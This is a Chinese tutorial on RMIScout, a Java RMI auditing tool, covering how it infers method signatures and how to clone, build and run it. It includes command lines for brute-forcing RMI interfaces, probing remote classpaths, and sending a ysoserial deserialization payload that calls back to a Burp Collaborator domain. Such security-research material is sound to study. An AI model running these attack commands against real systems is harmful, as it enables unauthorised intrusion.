RMIScout怎么使用

這篇文章主要介紹“RMIScout怎么使用”，在日常操作中，相信很多人在RMIScout怎么使用問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”RMIScout怎么使用”的疑惑有所幫助！接下來，請跟著小編一起來學習吧！

RMIScout

RMIScout是一款針對Java RMI的安全審計工具，該工具可以使用字典和爆破策略來枚舉Java RMI功能，并利用其中潛在的RMI參數(shù)解集（Unmarshalling）漏洞。實際上，RMIScout能夠針對Java RMI接口執(zhí)行基于字典的暴力破解攻擊，并在不需要調(diào)用任何其他方法的情況下安全地猜測方法簽名。

在一臺存在錯誤配置的服務器中，任何已知的RMI簽名都會使用non-primitive類型，比如說java.lang.String，而在這種情況下，攻擊者將能夠可通過將對象轉(zhuǎn)換為序列化的Payload來利用此漏洞。這種錯誤配置非常常見，比如說，VMWare vSphere Data Protection + vRealize Operations Manager、Pivotal tc Server and Gemfire和Apache Karaf + Cassandra等等。

RMIScout整合ysoserial和GadgetProbe將可以針對錯誤配置進程范圍序列化篩選器（JEP 290）的服務執(zhí)行反序列化攻擊。

功能介紹

1、提供字典和基于文本的爆破策略，而不是對64位方法哈希進行爆破；

2、在無需任何方法調(diào)用的情況下識別RMI方法；

3、提供了一種簡單的方法來利用已知的不安全RMI參數(shù)解集漏洞，并與ysoserial或Payload實現(xiàn)ysoserial.payloads.ObjectPayload集成；

4、集成GadgetProbe來識別遠程類，以幫助識別相關軟件并構建gadget鏈；

如需開始搜索，可參考工具自帶的lists/prototypes.txt字典文件，該字典文件涵蓋了超過15000種RMI原型。

工作機制

可在無需執(zhí)行RMI函數(shù)的情況下對RMI方法進行識別，RMIScout使用了底層RMI網(wǎng)絡功能和動態(tài)類生成方法來發(fā)送帶有故意不匹配類型的RMI調(diào)用，以觸發(fā)遠程異常。所有參數(shù)都將替換為動態(tài)生成的可序列化類，該類的名稱假定為255個字符，并且在遠程類路徑中不存在。比如說：

遠程接口：

void login(String user, String password)

RMIScout將會調(diào)用：

login((String) new QQkzkn3..255 chars..(), (String) new QQkzkn3..255 chars..())

如果目標類存在，那么將會觸發(fā)一個由ClassNotFoundException發(fā)出的遠程java.rmi.UnmarshalException異?；騾?shù)解集錯誤，整個過程無需調(diào)用底層方法。

完整技術手冊：【點我獲取】

工具下載

廣大研究人員可以使用下列命令將項目源碼克隆至本地：

git clone https://github.com/BishopFox/rmiscout.git

工具使用

針對遠程RMI服務，使用函數(shù)原型字典執(zhí)行基于字典的爆破攻擊：

./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

使用方法字典和其他選項執(zhí)行爆破攻擊：

./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

根據(jù)特定的ysoserial Payload以及Payload參數(shù)來轉(zhuǎn)換對象派生類型：

./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

使用GadgetProbe和已知簽名對遠程類路徑執(zhí)行爆破：

./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

構建和運行

使用包含的rmiscout.sh自動化對項目代碼進行構建，其封裝了java -jar語句：

./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

或者，你也可以手動構建項目源碼，即使用傳統(tǒng)的java -jar語句：

# Manually build JAR

./gradlew shadowJar

java -jar build/libs/rmiscout-1.01-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt <host> <port>

工具使用

運行RMI演示服務器，并使用demo/wordlist.txt字典文件：

cd demo

./start.sh

到此，關于“RMIScout怎么使用”的學習就結束了，希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習，快去試試吧！若想繼續(xù)學習更多相關知識，請繼續(xù)關注億速云網(wǎng)站，小編會繼續(xù)努力為大家?guī)砀鄬嵱玫奈恼拢?/p>